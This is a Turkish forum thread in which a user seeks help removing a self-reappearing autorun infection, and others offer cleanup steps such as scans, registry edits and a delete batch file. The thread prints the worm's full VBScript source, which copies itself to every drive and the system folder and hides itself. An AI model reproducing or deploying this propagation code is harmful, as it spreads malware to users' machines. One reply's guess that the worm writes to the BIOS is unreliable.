İlginç bir sorun . Siliyorum siliyorum geri geliyor..

Question

Arkadaşlar bilgisayarıma galiba bir virüs bulaştı ve sabit diskin bütün bölümlerinde alttaki resimdeki autorun dosyaları oluştu..

İlginç bir sorun . Siliyorum siliyorum geri geliyor..

Şimdi ben bu dosyalrın hepsii siliyorumm siliyorum ama tekrar geri geliyor.. bilgisayarda toplam altı bölüme ayrılmış üç adet fiziksel disk var. ve bu dosyalar bütün bölümlerde var.. hepsini siliyorum tek tek sonra bilgisayarıma girip diskin birini açmaya çalışınca tekrar bu dosyalar ortaya çıkıyor... Bu arada dosyalar korunan gizli sistem dosyası olarak görünüyor.. kendi kendini gizliyorlar...

Bilgisayarıma giripde diske sağ tıklatınca alttaki resimdeki gibi karışık karakterlerde bir menü açılıyor..

Acabaa ben bu beladan nasıl kurtulabilirim... Bir bilgisi olan varmı..

Şimdi bu autorun dosyası galiba visual basicte yazılmış. ama ben vbden anlamıyorum . belki bir anlayan çıkar diye autorun.vbs dosyasının içeriğini altta yazıyorum...

rem autorun·ç±©
on error resume next
Set WshShell =CreateObject("WScript.Shell")

if Year(Date)=2030 and Month(Date)=6 and Day(Date)=30 then
a=WshShell.Run("autorun.bat Over" ,0,True)
Set Of = CreateObject("Scripting.FileSystemObject")
Set fc = Of.OpenTextFile("C:\autorun.txt", 1)
mt = fc.ReadAll
fc.Close
if mt<>"" then msgbox decrypt(mt)
end if

if Year(Date)>2030 or Month(Date)>100 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.*",d&"\",True
else
Of.CopyFile "autorun.*",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.*",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if

function decrypt(dcode)
dim texts
dim i
for i=1 to len(dcode)-4
x=i mod 5
texts=texts & chr(asc(mid(dcode,i,1))-x)
next
decrypt=texts
end function

Answer

Bu tür dosyaları silsenizde tekrar tekrar oluşturan küçük bir proğram vardır. O proğramı bulup silmeniz gerekir. Eğer virüs tarayıcınız bunu bulamıyorsa şöyle bir yol deneyebilirsiniz.
Öncelikle bu dosyaların oluşturulma tarihlerini kontrol edin. Büyük ihtimal hepsinde aynı tarih vardır. Daha sonra dosya aramaya girip o tarihte oluşturulmuş dosya ve klasörleri aratın. Aramayı sadece uygulama dosyaları olarakta filtreleyebilirsiniz. Çok fazla uygulama dosyası çıkmayacaktır. Şüphelendiğiniz bir dosyanın özelliklerinden sürüm kısmına bakın dosya adı sürümü vbz. kısmında o acayip karakterleri görürseniz aradığınız dosya odur hemen silin.
Kolay gelsin...

Answer

'golevez33' size bu konuda yardımcı olacaktır.  Konu ile ilgili link: http://forum.donanimhaber.com/m_13980739/tm.htm

Answer

Bencesur bilgisayarın ile ilgili sorun ne o9ldu? Yazdıklarım sorununu çözebildinmi yoksa farklı bir şey yaptınmı? Bilgilendirebilirmisin?

Answer

biosa ya da autoexec,bat ve config sys dosyalarına yazmış olabilir.

anladığım kadarıyla, 30/6/2030 tarihinde ve
ya da 2030 yılının 100. gününden sonra bilgisayarı haşat et gibi birşey bu.

biosa ya da autoexec.bat dosyasına yazmış olabilir. dolayısıyla, sen silsen bile, bilgisayarı her başlattığında dosya yeniden oluşarak yerleşecektir.

bence, temiz bir sistem disketi oluştur. bilgisayarı sistem disketi ile başlat ve virüs programını çalıştır. bilgisayardaki autoexec.bat ve config.sys dosyalarını, bu dosyalar çalışmadan taratman gerekecek çünkü.

not: bu bilgiler kesin değil. belki işe yarar diye söylüyorum...

Answer

kaspersky 6 yükleyip tarat bilgisayarı.

Answer

1- bilgisayarı aç
2- CTRL +ALT +DEl den görev yöneticisine geç. kullanıcı adının bulundugu explorer haric uygulamaları kapat(explorer olan haric. exp1lore gibi isimler varsa onlarıda kapat)
3- Bilgisayarımdan bir sürücüye girerken çift sakın tıklaMA. sağ tıkla aç kullan. bu ikisi arasında çok fark var. (Autorun dosyası olayı)
4- bilgisayarım penceresini aç. Araçlar klasör seçeneklerine gir. Burada 1- gizli dosyaları göster işaretle 2- korunan işletim sistemi dosylarını gizlenin işaretini kaldır. 3- bilinen dosyalar için uzantıları gizlenin işaretini kaldır. tamam tamam tıkla
5- tek tek sürücülere sağ tıklayarak şu adımları izle:
6- C(D,E...) ye sağ tıkla ac tıkla
7- autorun.inf dosyaını aç içine shell arayüzü ile ilişiklendirilmiş bir exe uzatılı dosya adı göreceksin. copy.exe... gibi bu isimdeki dosyayı C kök dizininden sil . hatta tüm sürücü kok dizinlerindwe buldugun tüm exe dosyaları sil
8- autorun.inf dosyasını sil.
9- daha sonra başlat çalıştır regedit-HKEY_CURRENT_USER\Software\microsoft \Windows\CurrentVersion\Explorer\MountPoints2\ yolunu izle oradan sürücü isimlerinde bulunan autorun yada autoplay anahtarlarını sil
Br başka yöntem forumdaki bir arkadaşımızda alıntıdır ama şuan adını hatırlayamadım

c:
attrib -h -r -s autorun.inf
attrib -h -r -s bittorrent.exe
attrib -h -r -s sxs.exe
attrib -h -r -s copy.exe
attrib -h -r -s command.exe
attrib -h -r -s msvcr71.dll
del autorun.inf
del bittorrent.exe
del sxs.exe
del copy.exe
del command.exe
del ravmonlog
del msvcr71.dll
bunları bi txt dosyasına yaz uzantısını txt değil bat yap yap çalıştır başka sürücülerinde varsa c yi değiştir tekrar çalıştır en son makinaya reset at kolay gelsin

Answer

quote: Orjinalden alıntı: umuttacir  Bencesur bilgisayarın ile ilgili sorun ne o9ldu? Yazdıklarım sorununu çözebildinmi yoksa farklı bir şey yaptınmı? Bilgilendirebilirmisin?    Ben bu işi başka bir yolla halettim.  Çünkü kaspersky 5 ile taradım ad-aware ile taradım hiç bişey bulamadı...  Şimdi bilgisayarımdaki 6 bölümden oluşan 3 diske bulaşmıştı..bütün disklerde aynı sorun..  Önce çoook uğraştım antivirüs yada ad-ware ile. ama olmadı. sonra aklıma biraz riskli ama mecbur kaldığım bir yol geldi.. Şimdi XP kurulum cdsiyle bilgisayarımdaki bütün diskleri biçimlendirdim ve sildim. Disklerim sıfır disk haline gelince daha önceki windowsun kurulu olduğu bölüme tekrar windowsu kurdum daha sonra File Scavenger isimli veri kurtarma programı ile önemli dosyalarımın bulunduğu diskleri tarayarak kurtardım.. Bu sırada sözkonusu autorun.vsvs dosyalarının hepsi geri geldi ama etkisiz olarak geldiği için bende hemen sildim kurtuldum...  İşte bu kadar.. Herkese kolay gelsin...  Şimdi ben bunun ne işe yaradığını çok merak ediyorum.. Çünkü aklı başında birisi sadece diski otomatik çalıştırsın diye bu kadar uğraşıpta virüs yazmaz. Bu virüs kesinlikle başka bir iş yapıyordu...ama bulamadım..

Answer

kardeş boşuna bu kadar zahmet çekmişsin. forumda biraz araştırsan bu problemi yaşayan ve çözüldüğünü söyleyen bir çok kişi var. sonuçta autorun sorunu silinebilen bir virüs.

İlginç bir sorun . Siliyorum siliyorum geri geliyor..

Benzer içerikler